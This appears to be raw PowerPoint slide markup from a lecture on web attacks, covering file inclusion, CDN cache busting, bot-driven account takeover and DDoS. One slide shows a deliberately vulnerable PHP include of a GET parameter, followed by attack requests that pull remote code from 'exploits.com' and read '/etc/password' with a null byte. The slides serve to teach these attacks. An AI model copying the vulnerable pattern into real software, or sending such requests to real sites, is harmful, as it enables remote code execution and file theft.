            <a:off x="4076747" y="5276850"/>
            <a:ext cx="6344879" cy="166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818" y="1449228"/>
            <a:ext cx="320792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User selects a color:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371703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807720" y="1840230"/>
            <a:ext cx="13167360" cy="2903220"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>   if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>( $_GET['COLOR'] ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>     include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>( $_GET['COLOR'] . '.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850900" y="709295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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868818" y="1258728"/>
            <a:ext cx="1397696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 script on the server called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custom_color.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> chooses which file to include based on color:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868818" y="4821078"/>
            <a:ext cx="850264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Attacker sets color to something other than red or blue!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="868818" y="5337810"/>
            <a:ext cx="13167360" cy="1659890"/>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403618" indent="170064" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="818575" indent="158725" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1147364" indent="242624" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>custom_color.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>=http://exploits.com/malware39</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>custom_color.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>initialize_database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>custom_color.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>/password%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8770557" y="3373278"/>
            <a:ext cx="3985386" cy="1940243"/>
            <a:chOff x="8770557" y="3373278"/>
            <a:chExt cx="3985386" cy="1940243"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="9867900" y="3962400"/>
              <a:ext cx="895350" cy="135112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8770557" y="3373278"/>
              <a:ext cx="3985386"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remote file inclusion (RFI)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10315575" y="6105148"/>
            <a:ext cx="3972157" cy="892552"/>
            <a:chOff x="10315575" y="6105148"/>
            <a:chExt cx="3972157" cy="892552"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11506201" y="6105148"/>
              <a:ext cx="2781531" cy="892552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>local file inclusion</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(LFI)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="10934700" y="6582727"/>
              <a:ext cx="57150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Right Brace 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10315575" y="6167755"/>
              <a:ext cx="447675" cy="829945"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrac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79761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Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker adds query strings to the end of a requested URL, e.g.,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://ak.xyz.com/manual.pdf?id=832164328</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker hopes that the CDN will view each request with a different query string as a request for a different object, and fetch a new copy from the content provider.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319471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7ACA-19F4-41D8-90E7-A17BFAACE104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious login attempts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D431F1E2-93BD-4007-B341-2835023867D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B4AB64C-B6C0-44FD-B242-DE6ABAF633F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="35503" t="46932" r="27952" b="11887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1554480"/>
            <a:ext cx="8641080" cy="5233908"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3404625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Bot-Based Account Takeover: Obtain Password Dump</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3994190" y="1645920"/>
            <a:ext cx="6642021" cy="5852160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4147842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Compromised Home Cable Modems/Routers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="619598" y="1983484"/>
            <a:ext cx="5740229" cy="5348488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728441" y="2594641"/>
            <a:ext cx="7568152" cy="4126170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3291335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Takeover Campaign Attack Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Content Placeholder 15"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="811041" y="1112846"/>
            <a:ext cx="8903921" cy="6447535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2310994" y="2314979"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2800624" y="3560758"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2282478" y="5705329"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7413616" y="2127284"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6625986" y="3560758"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7455042" y="5707203"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4721234" y="2127284"/>
            <a:ext cx="921232" cy="860622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4721233" y="6561271"/>
            <a:ext cx="921232" cy="860622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 32"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4721232" y="4353633"/>
            <a:ext cx="1268796" cy="693571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198891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Largest DDOS Attacks by Year</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2170888" y="3860886"/>
            <a:ext cx="1011815" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gbps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9484CC57-2522-4E72-9E7F-8A94BC449EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249936" y="4655656"/>
            <a:ext cx="1229824" cy="572464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3120" dirty="0"/>
              <a:t>Krebs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A1C97C0-3F63-45A7-A660-45B8C13C431A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10265973" y="2329558"/>
            <a:ext cx="1428596" cy="572464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3120" dirty="0"/>
              <a:t>GitHub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Chart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418278958"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3749040" y="2194560"/>
          <a:ext cx="7475220" cy="5322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5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IP Persistence: Finance Customer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1285265"/>
